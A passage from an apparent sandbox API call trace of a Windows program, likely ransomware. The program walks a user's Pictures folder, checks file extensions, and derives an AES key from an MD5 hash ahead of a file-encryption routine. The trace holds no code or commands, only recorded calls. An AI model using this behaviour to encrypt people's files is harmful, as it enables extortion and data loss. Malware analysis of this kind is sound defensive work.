lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tJ3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GTLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TLOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOl3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ol3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FHI5E.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.989] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.989] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.989] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.989] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.989] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.989] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.989] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.989] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.990] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0xe088b7f0, ftLastWriteTime.dwHighDateTime=0x1d5e08b, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 0x90ae18 [0188.990] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.990] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.990] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.990] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.990] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.990] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.990] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.990] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.991] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.991] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.991] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.991] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.991] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.991] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.991] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0188.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.991] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0188.992] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.992] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.992] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.992] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.992] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.993] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.993] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.993] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.993] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.993] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.993] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.993] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.994] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.003] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.003] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.003] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.003] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.003] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.003] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.003] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.004] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.004] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0189.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.004] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.004] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.005] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.005] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0189.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0189.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 